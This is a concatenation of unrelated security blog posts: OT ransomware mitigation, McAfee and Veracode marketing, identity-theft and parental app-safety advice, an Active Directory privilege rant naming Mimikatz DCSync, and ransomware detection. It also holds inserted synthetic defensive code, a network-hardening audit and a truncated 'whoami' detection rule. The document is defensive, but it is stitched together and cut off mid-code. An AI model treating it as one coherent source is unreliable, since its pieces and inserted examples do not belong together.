Ransomware may result in similar outcomes when it reaches IT-based assets in OT networks, for example human-machine interfaces (HMIs), supervisory control and data acquisition (SCADA) software, and engineering workstations. Most of this equipment relies on commodity software and standard operating systems that are vulnerable to a variety of IT threats. Mandiant Intelligence is aware of at least one incident in which an industrial facility suffered a plant shutdown due to a large-scale ransomware attack, based on sensitive sources. The facility's network was improperly segmented, which allowed the malware to propagate from the corporate network into the OT network, where it encrypted servers, HMIs, workstations, and backups. The facility had to reach out to multiple vendors to retrieve backups, many of which were decades old, which delayed complete restoration of production.

As recently as February 2020, the Cybersecurity and Infrastructure Security Agency (CISA) released Alert AA20-049A describing how a post-compromise ransomware incident had affected control and communication assets on the OT network of a natural gas compression facility. Impacts to HMIs, data historians, and polling servers resulted in loss of availability and loss of view for human operators. This prompted an intentional shutdown of operations that lasted two days.

Mitigating the Effects of Ransomware Requires Defenses Across IT and OT

Threat actors deploying ransomware have made rapid advances both in terms of effectiveness and as a criminal business model, imposing high operational costs on victims. We encourage all organizations to evaluate their safety and industrial risks related to ransomware attacks. Note that these recommendations will also help to build resilience in the face of other threats to business operations (e.g., cryptomining malware infections). While every case will differ, we highlight the following recommendations.

For custom services and actionable intelligence in both IT and OT, contact FireEye Mandiant Consulting, Managed Defense, and Threat Intelligence.

  • Conduct tabletop and/or controlled red team exercises to assess the current security posture and ability of your organization to respond to the ransomware threat. Simulate attack scenarios (mainly in non-production environments) to understand how the incident response team can (or cannot) detect, analyze, and recover from such an attack. Revisit recovery requirements based on the exercise results. In general, repeatedly practicing various threat scenarios will improve awareness and ability to respond to real incidents.
  • Review operations, business processes, and workflows to identify assets that are critical to maintaining continuous industrial operations. Whenever possible, introduce redundancy for critical assets with low tolerance to downtime. The right amount and type of redundancy is unique for each organization and can be determined through risk assessments and cost-benefit analyses. Note that such analyses cannot be conducted without involving business process owners and collaborating across IT and OT.
  • Logically segregate primary and redundant assets either by a network-based or host-based firewall with subsequent asset hardening (e.g., disabling services typically used by ransomware for its propagation, like SMB, RDP, and WMI). In addition to creating policies to disable unnecessary peer-to-peer and remote connections, we recommend routine auditing of all systems that potentially host these services and protocols. Note that such architecture is generally more resilient to security incidents.
  • When establishing a rigorous back-up program, special attention should be paid to ensuring the security (integrity) of backups. Critical backups must be kept offline or, at minimum, on a segregated network.
  • Optimize recovery plans in terms of recovery time objective. Introduce required alternative workflows (including manual) for the duration of recovery. This is especially critical for organizations with limited or no redundancy of critical assets. When recovering from backups, harden recovered assets and the entire organization's infrastructure to prevent recurring ransomware infection and propagation.
  • Establish clear ownership and management of OT perimeter protection devices to ensure emergency, enterprise-wide changes are possible. Effective network segmentation must be maintained during containment and active intrusions.
  • Hunt for adversary intrusion activity in intermediary systems, which we define as the networked workstations and servers using standard operating systems and protocols. While the systems are further away from direct control of physical processes, there is a much higher likelihood of attacker presence.
  • Note, that every organization is different, with unique internal architectures and processes, stakeholder needs, and customer expectations. Therefore, all recommendations should be carefully considered in the context of the individual infrastructures. For instance, proper network segmentation is highly advisable for mitigating the spread of ransomware. However, organizations with limited budgets may instead decide to leverage redundant asset diversification, host-based firewalls, and hardening as an alternative to segregating with hardware firewalls.
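Several of the recommendations above can be checked mechanically: whether assets in the OT zone expose the services ransomware uses to propagate (SMB, RDP, WMI), whether the firewall allows those services across the IT/OT boundary, and whether critical assets have backups kept offline or on a segregated network. The block below is an added example written for this page, not FireEye's code: it encodes those three rules and runs them over a constructed inventory of hosts and firewall rules of the kind an organization might export from its asset database and firewall manager. Host names, zones, ports, roles and rules are all constructed for illustration.

```python
"""Added example: auditing hardening, segmentation and backup posture
against the ransomware recommendations above.

The inventory and firewall rules are constructed for this example; the
port-to-service mapping reflects the standard Windows ports for SMB (445),
RDP (3389) and the RPC endpoint mapper WMI relies on (135).
"""
PROPAGATION_PORTS = {445: "SMB", 3389: "RDP", 135: "WMI/RPC"}

# Constructed inventory: name, zone, listening ports, role, backup location.
# "backup" is None (no backup), "offline", "segregated", or the zone the
# backup copy is reachable from.
HOSTS = [
    {"name": "eng-ws-01", "zone": "OT", "ports": {445, 3389},
     "role": "engineering-workstation", "backup": None},
    {"name": "hmi-02", "zone": "OT", "ports": {445}, "role": "hmi", "backup": None},
    {"name": "historian-01", "zone": "OT", "ports": {1433},
     "role": "historian", "backup": "offline"},
    {"name": "erp-db-01", "zone": "IT", "ports": {1521}, "role": "erp", "backup": "IT"},
    {"name": "backup-srv", "zone": "IT", "ports": {445}, "role": "backup-server", "backup": None},
]

# Constructed firewall rules: (source zone, destination zone, port, action).
FW_RULES = [
    ("IT", "OT", 445, "allow"),
    ("IT", "OT", 3389, "allow"),
    ("IT", "OT", 502, "allow"),    # Modbus/TCP: expected OT traffic, not flagged
    ("OT", "IT", 135, "allow"),
    ("IT", "IT", 445, "allow"),    # intra-zone: out of scope for this check
]

# Roles whose loss halts production (the post's "critical assets").
CRITICAL_ROLES = {"hmi", "historian", "engineering-workstation", "erp"}
SAFE_BACKUP_LOCATIONS = {"offline", "segregated"}


def audit_hosts(hosts):
    """Return (host, finding, detail) tuples for hardening and backup gaps."""
    findings = []
    for h in hosts:
        exposed = sorted(PROPAGATION_PORTS[p] for p in h["ports"] if p in PROPAGATION_PORTS)
        # OT intermediary systems should not listen on propagation services.
        if h["zone"] == "OT" and exposed:
            findings.append((h["name"], "propagation-service", ", ".join(exposed)))
        if h["role"] in CRITICAL_ROLES:
            backup = h["backup"]
            if backup is None:
                findings.append((h["name"], "no-backup", "critical asset without a backup"))
            elif backup not in SAFE_BACKUP_LOCATIONS:
                # A backup reachable from the same network is encryptable.
                findings.append((h["name"], "backup-reachable", f"backup stored in zone {backup}"))
    return findings


def audit_firewall(rules):
    """Flag allow rules carrying propagation services across the IT/OT boundary
    in either direction (lateral movement can originate on either side)."""
    findings = []
    for src, dst, port, action in rules:
        if action != "allow" or src == dst:
            continue
        if port in PROPAGATION_PORTS and {src, dst} == {"IT", "OT"}:
            findings.append((f"{src}->{dst}:{port}", "cross-zone-propagation", PROPAGATION_PORTS[port]))
    return findings


def audit(hosts=HOSTS, rules=FW_RULES):
    """Run both audits and return a combined, sorted list of findings."""
    return sorted(audit_hosts(hosts) + audit_firewall(rules))


if __name__ == "__main__":
    for subject, finding, detail in audit():
        print(f"{subject:18} {finding:24} {detail}")
```

Running the audit on this inventory reports the two OT endpoints listening on SMB/RDP, the three cross-zone rules for SMB, RDP and RPC, and the backup gaps on critical assets, while leaving the Modbus rule and the offline historian backup alone. The same rule set can be re-run after each change window, which is the routine auditing the recommendations call for.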

Introducing McAfee Unified Cloud Edge: Cloud-Native Security for SASE

McAfee is thrilled to announce the availability of Unified Cloud Edge, the most complete security solution for Secure Access Service Edge (SASE) architectures. Enterprises today have lost visibility and control over their data as it travels from any device, in any location, directly to cloud services. Unified Cloud Edge addresses this challenge with a unified security architecture that protects data from device-to-cloud while protecting against cloud-native breach attempts that are invisible to the corporate network.  

McAfee Unified Cloud Edge is part of MVISION, the cloud-native security platform from McAfee. It begins with three core technologies converged into a single solution:  

  1. Cloud Access Security Broker (CASB): Direct API and reverse proxy-based visibility and control for cloud services 
  2. Secure Web Gateway (SWG): Proxy-based advanced protection against web-based attacks; visibility and control over web traffic and unsanctioned cloud services 
  3. Data Loss Prevention (DLP): Agent- and network-based visibility and control over sensitive data 

Simplified architecture for McAfee Unified Cloud Edge

These technologies create a secure environment for the adoption of cloud services and enablement of access to the cloud from any device for ultimate workforce productivity. Companies can accelerate their business through faster adoption of transformative cloud services by protecting their data and assets with Unified Cloud Edge.  

There are two prominent areas of convergence engineered to create this solution: 

  1. CASB and Cloud-based SWG are now managed together. We converged our cloud-based Web Gateway technology into our industry-leading CASB, giving customers one location to protect data and defend against threats in the cloud, along with traffic to and from the cloud. The cloud-based web gateway has been re-architected to enterprise scale, with an industry-high 99.999% availability. New capabilities are enabled by cross-referencing web and cloud intelligence in a single policy.   

Policy example: Our cloud-native secure web gateway using CASB risk ratings to block all high-risk cloud services.

  2. All data loss prevention (DLP) enforcement points share the same classifications, reporting, and workflows. DLP at the device, in motion through the network, and in the cloud now share one source for data classifications and a single location for reporting and remediation workflows. McAfee ePO is the starting point, where classifications built for on-premises DLP are pushed to the cloud in one click for use in any cloud service. All incidents then flow back to ePO for a single location to conduct reporting and remediation workflows. This eliminates the need to query multiple sources for incident data and to manually join search results for incident response.

Policy example: One-click push for all DLP content rules to go to CASB.


Expanding the Threat Prevention Capabilities of Unified Cloud Edge with Light Point Security 

To deliver a complete security architecture for a Secure Access Service Edge (SASE), we have not only dedicated internal teams to innovation, but also looked to the market for pioneers to join our team and contribute their technology and expertise. McAfee has agreed to acquire Light Point Security, a pioneer in browser isolation founded by former employees of the National Security Agency (NSA) to expand the threat prevention capabilities of Unified Cloud Edge.  

Here’s why we decided to bring Light Point Security into the McAfee family. The web remains a primary source of malware infiltration for every enterprise. Today, our secure web gateway technology has a unique, industry-leading approach to malware prevention – real-time emulation. This is a highly effective, high-performance approach: emulation removes the vast majority of malware in milliseconds as traffic is processed. The next evolution is removing the ability for malicious code to reach an end user altogether.

Light Point Security’s browser isolation technology takes the end user’s web browsing session and isolates the page remotely in a secure location, then replicates an interactive image of the session in the user’s browser with a technique called pixel mapping. This protects the end user against web-based threats because malicious code can’t leave the isolated browser, which is remote from their endpoint. We plan to integrate this technology into our cloud-native secure web gateway for use in any web security policy.

How Does Unified Cloud Edge Reduce the Cost and Complexity of Security in Secure Access Service Edge (SASE) Architecture?  

Secure Access Service Edge (SASE) is an architectural framework that dissolves the data center perimeter and creates a new edge formed dynamically by any cloud service and devices in any location. Security policy shifts to the user session and data, away from a defined perimeter of control. This is a critical evolution that addresses the unpredictable nature of cloud service adoption and mobile users.  

In a SASE architecture there are two distinct elements: how data is routed to the cloud, and how it is secured. At McAfee, we are focused on securing data and preventing threats from device to cloud. With Unified Cloud Edge, we are releasing the most complete cloud-native solution for security in a SASE architecture.

At the device, Unified Cloud Edge applies industry-leading data protection technologies, including encryption, to monitor sensitive data in use, at rest, and in motion.  

Through the web, we route traffic from managed devices in any location and from physical networks through our cloud-native proxy to apply access control, data protection, and threat prevention policies. 

In the cloud, Unified Cloud Edge integrates directly with cloud services to again apply industry-leading data protection to monitor sensitive data entering the cloud, created in the cloud, and attempting to leave cloud services. With User and Entity Behavior Analytics (UEBA), cloud-native threats can be detected within and across multiple cloud service providers.  

Enterprises have a clear choice. They can either stitch together CASB, DLP and SWG solutions from different vendors, which increases operational overhead through added cost and complexity, or they can choose a solution which converges these enforcement points into a unified experience with a single context from device to cloud. With Unified Cloud Edge, enterprises have a converged approach to security in a SASE architecture which dramatically reduces their cost and complexity, delivering maximum business agility from the cloud.


Learn more about Unified Cloud Edge here: www.mcafee.com/unifiedcloud

The post Introducing McAfee Unified Cloud Edge: Cloud-Native Security for SASE appeared first on McAfee Blogs.

Cloud Security Guide to RSA 2020 – Where the World Talks Cloud Security

The RSA conference is an expanse of innovation, networking, and insight through countless conversations we’re able to have with customers seeking to solve cloud security challenges. The common theme when it comes to cloud contrasts from what you may think about cybersecurity.

CASB has been a pivotal technology in this journey and we’ve heard it consistently. Our customers are seen as strategic enablers in their organizations by securing data in the cloud apps their users want to adopt, without friction to their experience. During the week of RSA, there will be multiple exclusive events hosted by McAfee. See the full schedule of events and presentations below:

Cloud Security Alliance Dedicated Event

Each year, the Cloud Security Alliance hosts a one day event before the RSA Conference. In the 11th Cloud Security Alliance Summit at the RSA Conference, thought leaders from multi-national enterprises, government, cloud providers and the information security industry will share best practices in cloud privacy and security. We will also explore new frontiers that are accelerating change in information security, such as artificial intelligence, quantum supremacy, blockchain, and fog computing.

Check out our CSA Summit Keynote—all you need is your RSA Expo Pass!

Monday, February 24 | 1:00PM – 1:20PM | Moscone West, Room #3014

McAfee Theater Sessions

The conference welcomes industry experts and professionals to the McAfee stage. Check out one of our 15-minute mini-theater sessions, where you will hear from our customers about how they made the Cloud their most secure environment for business. Schedule is available via the QR Code and listed below.

Oh, and did I mention the T-shirt?


Stop by our RSA Booth #N5745 and meet with a Cloud Security Specialist for a demo on how we can work together to make the cloud your most secure environment for business.


The post Cloud Security Guide to RSA 2020 – Where the World Talks Cloud Security appeared first on McAfee Blogs.

Veracode Wins Three Awards for AppSec Excellence as a Leader in DevSecOps

We’re excited to announce that we have received three awards for our innovative solutions in application and information security!

Info Security Products Guide Silver Winner | Cyber Security Excellence Awards Winner | Cyber Defense Magazine InfoSec Awards Winner

Info Security Products Guide, the industry’s leading information security research and advisory guide, named Veracode a Silver Award winner in their Application Security and Testing category for the 16th Annual 2020 Info Security PG’s Global Excellence Awards. This honor recognizes cybersecurity and information technology vendors who offer advanced and innovative products, solutions, and services that help propel the industry forward.

Additionally, the 2020 Cybersecurity Excellence Awards named Veracode a gold winner in their software category as a leading SaaS-based AppSec platform that empowers developers and accelerates DevSecOps. Recipients of this award were selected both on the strength of their nomination and on a popular vote by members of the information security community.

We’re also honored to receive an award from Cyber Defense Magazine (CDM), the industry’s leading electronic information security publication, which named Veracode the winner of their Best Product for Application Security award.

For the past six months, CDM surveyed 3,200 pioneering companies that are changing the InfoSec game with advanced security products and services. Submissions were open to any startup, early-stage, later-stage, or public organization, and judges ultimately selected just 10 percent of those candidates to receive a coveted InfoSec Award during RSA Conference 2020.

“With cybercrime heading into the tens of billions of records stolen and potentially trillions of dollars in damages, we are proud to recognize Veracode as an award-winning innovator that offers a new approach to defeat these criminals,” said Pierluigi Paganini, editor-in-chief, Cyber Defense Magazine.

This is Cyber Defense Magazine's eighth year honoring InfoSec leaders from around the world. When selecting winners, judges looked for forward-thinking leaders in InfoSec that offer cost-effective solutions and help propel the industry forward in unexpected ways.

“These winners are the most innovative and proactive cybersecurity companies and service providers on the planet who are working to bring tomorrow’s cybersecurity solutions to market, today,” said Gary S. Miliefsky, Publisher of Cyber Defense Magazine.

Like CDM, Veracode is dedicated to thinking about the future of information security. This award exemplifies our dedication to creating groundbreaking solutions that help organizations secure the software they need to power their world.

You can find the full list of CDM's winners here and visit us at RSA Conference 2020 (booth N-5553) to learn more about our application security platform.

Frequently Asked Questions About Identity Theft

The more you know about identity theft, the better prepared you will be to prevent it from happening to you. Here are some commonly asked questions about identity theft.

What is identity theft?

Identity theft is when a person pretends to be you to access money, credit, medical care, and other benefits. They acquire your identity by stealing and using your personal information, such as your government ID number or bank account number. Once they have this information, identity thieves can really wreak havoc on your life; for example, they can clear out your bank account. They can also impersonate you in order to get a job or commit a crime. It can take a long time to clean up the mess.

Does identity theft only have to do with stealing money or credit?

No, financial identity theft, using your personal information to access your money or credit, is not the only type of identity theft, although it is the most common. There are other kinds of identity theft. Medical identity theft is when someone uses your information to receive medical care. Criminal identity theft is when someone takes over your identity and assumes it as his or her own. They can then give your name to law enforcement officers and voilà—you have a criminal record.

What are some things I can do to protect my identity online?

  • Be choosy. Be careful when sharing personal information online. Just because a website is asking for your information doesn’t mean it’s necessary to provide it to them. Ask who wants the information and why. Also, limit the amount of information you share on social media. Does everyone need to know the year you were born?
  • Think twice. Use caution when clicking on links and opening email attachments. If the link or attachment is from someone you don’t know, don’t open it.
  • Use secure Wi-Fi. When shopping or banking online, make sure you are using a secure wireless connection. Even better, use a Virtual Private Network (VPN) to encrypt your data and protect your online activity.
  • Permanently delete files from your PC. Putting your files in the recycle bin isn’t enough. Your device will still have the files, and they are therefore still accessible to identity thieves. Use security software that includes a digital shredder to make sure those files are truly wiped from your PC.
  • Install security software. Make sure all your devices have comprehensive security software that protects all your PCs, Macs, tablets and smartphones.

What are things I can do to protect my identity offline?

  • Shred. Use a cross-cut shredding machine or scissors to shred old credit card statements, offers, receipts, etc., to prevent dumpster divers from obtaining your information and creating accounts in your name.
  • Have a locked mailbox. This will keep thieves from stealing your mail, especially bank statements and credit card offers.
  • Secure your files. Get a fire-proof safe to store sensitive documents including credit cards you hardly use.
  • Keep an eye on your bank and credit card statements. Look for questionable activity.
  • Be careful when using ATMs. When you insert your ATM card into a compromised machine or run your credit card through a phony card reader, you could become a victim of skimming. Skimming is where a hacker illegally obtains information from the magnetic strip on the back of your credit or ATM card. This information can then be used to access your accounts or produce a fake credit card with your name and details on it.

How do I know if my identity has been stolen?

This list is not comprehensive but gives you a good idea on what to look out for.

  • You receive a bill for a credit card account that, though in your name, is not yours. This probably means a thief opened the account in your name.
  • You’re no longer receiving your usual snail mail or email statements. Contact the issuer to find out why.
  • Unfamiliar purchases on your credit card, even tiny ones (crooks often start out with small purchases, and then escalate). Challenge even a $4 purchase.
  • You receive a credit card or store card without having applied for one. If this happens, immediately contact the company.
  • Your credit report has suspicious information, like inquiries for credit that you didn’t make.
  • Collectors are calling you to collect payments you owe, but you owe nothing.
  • Your credit score is high (last time you checked), but you were denied credit for a loan or new credit card. A thief can easily ruin a credit rating.

If my identity is stolen, what should I do?

Finding out that your identity has been stolen can be stressful. First, take a deep breath then follow these initial steps.

  • Contact your local or national law enforcement agency. File a report that your identity has been stolen.
  • Call your bank and credit card companies. Notify them of fraudulent activity. They may be able to reimburse you for any money lost or close any unauthorized accounts.
  • Check with credit reference agencies. You’re entitled to one free copy of your credit report every 12 months from each of the three nationwide credit reporting companies. You can check to see if anyone has tried to get credit using your name.
  • Keep records. Keep track of all conversations and paperwork, the more detailed the better. Organize your data into one centralized place. This can be used as evidence for your case and can help you resolve the mess that identity theft can create.

To learn more about how you can protect yourself from identity theft, check out the McAfee Facebook page or follow @McAfee_Home on Twitter.


The post Frequently Asked Questions About Identity Theft appeared first on McAfee Blogs.

TikTok Challenge, Hoop App, and Other Headlines You May Have Missed

TikTok Challenge

Digital news that affects families seems to be dominating the headlines these days. To keep parents in the know, here are some of the stories you may want to give extra family discussion time to this week.

Skull Breaker Challenge Proving Unfunny 

Apps — video apps especially — can help kids tap into their creativity and give kids a critical way to connect. Where the fun can take a dangerous turn is in the way kids choose to use their technology. In this case, the poor choice is in the Skull Breaker Challenge (also called the Trip Jump Challenge), a prank resulting in some kids being hospitalized.

The prank, designed to get laughs and accumulate TikTok views, involves two kids tricking a third friend into making a dance video together. Three kids line up side by side for a planned group dance that will be videotaped and posted. As everyone jumps as planned, the two kids on either side swipe the legs out from under the middle person, causing him or her to fall backward. According to reports, the prank is surfacing mainly on TikTok but also on YouTube.

Safe Family Tip: Consider talking to your child about the dangers of online challenges and the risks already reported in the news. 1) Discuss the physical dangers doctors are warning the public about, including neck strain, concussion, skull fracture, long-term complications, or even death. 2) Using current news stories, explain personal responsibility and what can happen legally if your child hurts another person during a prank.

Snapchat’s Hoop App Being Called ‘Tinder for Teens’

Snapchat users (over 2.5 million in fact) are flocking to a new Tinder-like app called Hoop that interfaces with Snapchat. The app allows Hoop users to swipe through other Hoop users’ profiles and request to connect via their Snapchat profile name.

While the app asks a user’s age, much like other social sites, there’s no way to prove a user’s age. And, users can change their age at any time after creating an account. This type of app format can be tempting for kids who are naturally curious and seeking to meet new friends outside of their familiar social circle. There’s a potential for common issues such as catfishing, predator behavior, and inappropriate content. Kids as young as 12 can form connections with strangers. While their profile may be harmless, they can’t control the type of content that pops up on their screen from other users. Another red flag: Hoop users are rewarded with “diamonds” for sharing their Snapchat name and getting others to join Hoop, so the incentive to share daily and connect with a wide circle outside of one’s known friend group may prove tough for some kids to resist.

Safe Family Tip: While it’s challenging to stay on top of the constant array of new apps, it’s not impossible. One way to understand where your child spends his or her time online is with comprehensive monitoring software. Another way of monitoring activity is to physically check your child’s phone once a week for new app icons (see right) and take the time to talk about his or her favorite apps. Consider explaining the dangers of connecting with strangers and the real possibility that a new “cute 16-year-old” may be a predator attempting to win your child’s trust (it happens every day). Review and agree on which apps are considered safe and the expectations you have for your family’s online choices.

Another app to keep on your radar is Wink. Nearly identical to Hoop, Wink interfaces with Snapchat and is being promoted as a “new friend finder.” It has a similar “swipe” feature that connects kids to random Wink users and is currently ranked #15 in the app store.

Should phones be banned from schools?

A conversation gaining a quiet but consistent buzz is the merit of prohibiting phones from schools — a law France has enforced for two years that has parents, educators, and legislators talking. Several recent studies reveal that phone bans can lead to higher test scores and grades, longer attention spans, and increased cognitive capacity. Some schools in the U.S. have independently taken steps to curb or ban phones in hopes of helping distracted students focus.

Proponents of phones in school say a ban would be impossible to enforce and that technology is needed to help parents stay in touch with kids during the school day, especially for emergencies. Others say phones at school are a critical part of learning and raising self-sufficient, tech-savvy students prepared for a digital workforce.

Safe Family Tip: Begin the discussion with your child about the pros and cons of devices at school. Listen closely to his or her perspective. Discuss potential device-related issues that can be amplified during the school day such as cyberbullying, group chat conflicts, sexting, gaming during class, and using devices to cheat. Review expectations such as using phones only before and after school to connect with parents.

Stay tuned in the weeks to come as we take a closer look at other apps such as TikTok and WhatsApp Messenger that — when used unwisely — can lead to some surprising risks for kids. Until then, keep the digital safety conversation humming in your home. You’ve got this, parents!

The post TikTok Challenge, Hoop App, and Other Headlines You May Have Missed appeared first on McAfee Blogs.

The ONE Question NO ONE knows the Answer to at RSA Conference 2020

Hello,

On Monday, the RSA Conference 2020 will begin, where almost a thousand cyber security companies will showcase their greatest cyber security solutions to thousands of attendees, and where supposedly "The World Talks Security!"

If that's the case, let's talk security - I'd like to ask the entire RSA Conference just 1 simple cyber security question -

Question: Do the companies whose CISOs and cyber security personnel are attending the RSA Conference '20 have any idea exactly who has what privileged access in their foundational Active Directory deployments today?


If they don't, then perhaps instead of making the time to attend cyber security conferences, they should first focus on making this paramount determination, because without it, not ONE thing, let alone their entire organization, can be adequately secured.



Unequivocal Clarity

If this one simple question posed above isn't clear, here are 5 simple specific cyber security 101 questions to help gain clarity:

    Does our organization know exactly -
  • Q 1.  Who can run Mimikatz DCSync against our Active Directory to instantly compromise everyone's credentials?
  • Q 2.  Who can change the Domain Admins group's membership to instantly gain privileged access company wide?
  • Q 3.  Who can reset the passwords of, or disable the use of smartcards on, all Domain Admin-equivalent privileged accounts?
  • Q 4.  Who can link a malicious GPO to an(y) OU in Active Directory to instantly unleash ransomware system-wide?
  • Q 5.  Who can change or control who has what privileged access in our Active Directory?

If an organization does not have exact answers to these 5 simple questions today, it has absolutely no idea as to exactly who has what privileged access in its foundational Active Directory, and thus, it has absolutely no control over cyber security.




This is Paramount

If you don't think that having exact answers to these questions is paramount, then you don't know a thing about cyber security.


Just ask the world-famous and globally trusted $10 Billion cyber security company CrowdStrike; here's a quote from them - "A secure Active Directory environment can mitigate most attacks."




Zero out of 1000

There are almost 1000 cyber security companies exhibiting at the RSA Conference 2020, but guess how many of those 1000 companies could help you accurately determine the answers to 5 simple questions asked above? The answer is 0.


Not Microsoft, not EMC, not CrowdStrike, not FireEye, not Cisco, not IBM, not Symantec, not McAfee, not Palantir, not Tanium, not CyberArk, not Centrify, not Quest, not ZScaler, not BeyondTrust, not Thycotic, not Varonis, not Netwrix, not even HP, in fact no company exhibiting at RSA Conference 2020 has any solution that could help accurately answer these simple questions.

That's right - not a single cyber security company in the world (barring one), let alone the entirety of all cyber security companies exhibiting at or sponsoring the RSA Conference 2020 can help organizations accurately answer these simple questions.




The Key

The key to being able to answer the leading question above, as well as the five simple cyber security questions posed above lies in having just 1 simple, fundamental cyber security capability - Active Directory Effective Permissions.


There's only 1 company on planet Earth that possesses this key, and it's not going to be at the RSA Conference 2020 - this one.



Thanks,
Sanjay.

What Our Data Reveals About Security Debt

It’s a habitual practice we learn from an early age: keeping track of loans and credit card bills reduces overall debt and makes it easier to bring debt down quickly, avoiding those pesky spikes in interest. That very same practice applies to software security testing. Software is tested, vulnerabilities are revealed, and unaddressed vulnerabilities build up over time, with interest in the form of extra work compounding into security debt that’s increasingly difficult to reduce the longer you wait.

Often, the solution is reprioritizing flaws and improving fix rates to reduce liability over time. In our 10th annual State of Software Security (SOSS X) report, we discuss how some of our findings from over 85,000 application scans correlate with mounting security debt, and why you should pay attention.

Debt dwindles with frequent scanning

Just as making consistent payments on your credit card reduces debt over time, a frequent scanning cadence can lower the amount of debt your organization carries. When surveying the findings in our SOSS X report, we saw that frequent scanners (300+) have 5x less debt than infrequent scanners and they see a 3x reduction in median time to remediation (MedianTTR), or the amount of time it takes to fix flaws.

Scanning Cadence

Misaligned remediation priorities add to interest

In SOSS X, we talk about how some developers operate on LIFO (Last In, First Out) or FIFO (First In, First Out) methods for fixing flaws. Standard remediation procedures are not one size fits all: what works for your organization may not work for another. But the data we studied shows the likelihood of a flaw being fixed in the first month is only about 22 percent. That number drops down to 10 percent for the second month and 3 to 5 percent as time goes on.

Remediation Time

It’s clear from this data that developers are prioritizing the most recently found flaws above all else. The problem with this process is that it doesn’t take into account what is actually increasing risk. Ultimately, an older Cross-Site Scripting vulnerability is just as dangerous as a more recently discovered one. However, this chart sheds light on the relationship between scanning cadence and security debt: if we’re paying more attention to recently discovered flaws, frequent scanning means additional newer flaws to address. Boosting your scanning cadence and sitting down as a team to figure out your approach to prioritizing flaws can help set you on the right path.

Some industries are more prone to debt than others

Security debt doesn’t discriminate. It shows up in every industry, though some are more likely to accrue debt than others depending on how they prioritize fixes over time, as previously discussed. Data from SOSS X shows us that the Manufacturing and Government/Education industries carry more debt on average than other prominent industries.

Security Debt by Industry

What’s most important to note, though, are the trends over time. For example, we can see that around month four, organizations in Government and Education have an uptick in average fix rates. While Retail doesn’t carry much debt overall, companies tend to remediate the bulk of their flaws by month six or seven and contribute to debt reduction.

Security needs vary (capturing quick payment information versus storing robust patient histories and treatment plans, for example), but data from your specific industry will help you keep a pulse on average fix rates for security debt. You and your team can then review this data on a consistent basis when creating long-term plans for eliminating flaws.

PHP and C++ build up debt the fastest

Your plans for fixing flaws and reducing debt should factor in the languages you’re using. Why? The average security debt for PHP and C++ is huge and tends to grow over time, especially when compared to .NET, Android, Java, and JavaScript.

Language Flaw Debt

Issues with these two languages result from simplicity and age: PHP is suited to beginners and is thus susceptible to insecure coding, while C++ is a powerful language that requires hands-on management of memory and the stack, a source of vulnerabilities that are easier to introduce in C++ than in more common languages.

It’s difficult for most teams to change the language they’re using at work, but it’s important to keep in mind which languages easily add to security debt. Carrying this awareness and understanding changes in language trends will help you prepare efficient security processes throughout your career.

Cross-Site Scripting carries the heaviest liability for debt

When we look at the layers of flaw percentage by application age, it’s apparent that Cross-Site Scripting (A7-XSS) carries the largest amount of debt across applications. There’s also a slight rise in percentage as we inch closer to the 7-month mark, which tells us that XSS (among others) is a notable contributor to security debt.

Cross-site Scripting

XSS attacks occur when a malicious script is injected into a webpage and alters the way that page behaves, opening the site up to damaging unwanted activity, like bypassing authentication or stealing sensitive information. This prominent flaw is not picky when it comes to language, either, with notable findings in .NET, iOS, Java, JavaScript, PHP, and Python. Spanning languages with prevalence and risk, XSS is one to keep an eye on as you work towards reducing your security debt.

Read the full SOSS X report

Want more info? Check out our SOSS X page for the full report and additional data to absorb as we head into 2020. You can also listen to our podcast series with IDG, in which three of the episodes dig into security debt to drill down on different industries, why security debt grows deeper, and what's behind the buildup of unfixed flaws.


Disruptive ads enforcement and our new approach


As part of our ongoing efforts — along with help from newly developed technologies — today we’re announcing nearly 600 apps have been removed from the Google Play Store and banned from our ad monetization platforms, Google AdMob and Google Ad Manager, for violating our disruptive ads policy and disallowed interstitial policy.

Mobile ad fraud is an industry-wide challenge that can appear in many different forms with a variety of methods, and it has the potential to harm users, advertisers and publishers. At Google, we have dedicated teams focused on detecting and stopping malicious developers that attempt to defraud the mobile ecosystem. As part of these efforts we take action against those who create seemingly innocuous apps, but which actually violate our ads policies.

We define disruptive ads as ads that are displayed to users in unexpected ways, including impairing or interfering with the usability of device functions. While they can occur in-app, one form of disruptive ads we’ve seen on the rise is something we call out-of-context ads, which is when malicious developers serve ads on a mobile device when the user is not actually active in their app.

This is an invasive maneuver that results in poor user experiences that often disrupt key device functions, and this approach can lead to unintentional ad clicks that waste advertiser spend. For example, imagine being unexpectedly served a full-screen ad when you attempt to make a phone call, unlock your phone, or while using your favorite map app’s turn-by-turn navigation.

Malicious developers continue to become more savvy in deploying and masking disruptive ads, but we’ve developed new technologies of our own to protect against this behavior. We recently developed an innovative machine-learning based approach to detect when apps show out-of-context ads, which led to the enforcement we’re announcing today.

As we move forward, we will continue to invest in new technologies to detect and prevent emerging threats that can generate invalid traffic, including disruptive ads, and to find more ways to adapt and evolve our platform and ecosystem policies to ensure that users and advertisers are protected from bad behavior.

CSI: Evidence Indicators for Targeted Ransomware Attacks – Part II

In our first article we discussed the growing pattern of targeted ransomware attacks where the first infection stage is often an info-stealer type of malware, used to gain credentials and access in order to determine whether the target would be valuable for a ransomware attack. In this second part we will pick up where we left off: the attacker has a foothold on the network, either by controlling an infected host or by holding a valid account for a remote service.

Figure 1 Adversary has a beachhead

With either a valid account or access to a system in the company, the first two things an attacker wants to figure out are:

  1. What kind of rights do I have from this machine?
  2. Where the heck am I in this network?

One of the first commands you would observe as a responder is “whoami /all”. The output of this command gives the details of the account the attacker has on the machine with regard to groups and privileges. A great way to detect suspicious activity in your network is to set up a detection rule for the “whoami” command and assign it to the assets in use by executives or holders of key positions in the company. There might always be a techie executive in the company, but most of them will never open a command line.
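The detection rule described above, as an added example that is not part of the McAfee article: a scoring rule for whoami executions run over constructed process-creation records (the fields a Security 4688 or Sysmon event 1 would provide). The executive asset watchlist, hostnames, users and the sample records are all made up for the example; the extra weighting for `/all` and for scripting-host parents goes slightly beyond the article's rule and is an assumption.

```python
"""Host-based detection for `whoami` on high-value assets (added example, not the
article's own code). Events are constructed key=value process-creation records."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed watchlist: hostnames assigned to executives and holders of key positions.
EXEC_ASSETS = {"LT-CEO-01", "LT-CFO-02", "LT-GC-03"}

# Parents that indicate whoami was launched from a script rather than typed by a person;
# Empire, for instance, runs its commands through powershell.exe. (Assumed list.)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

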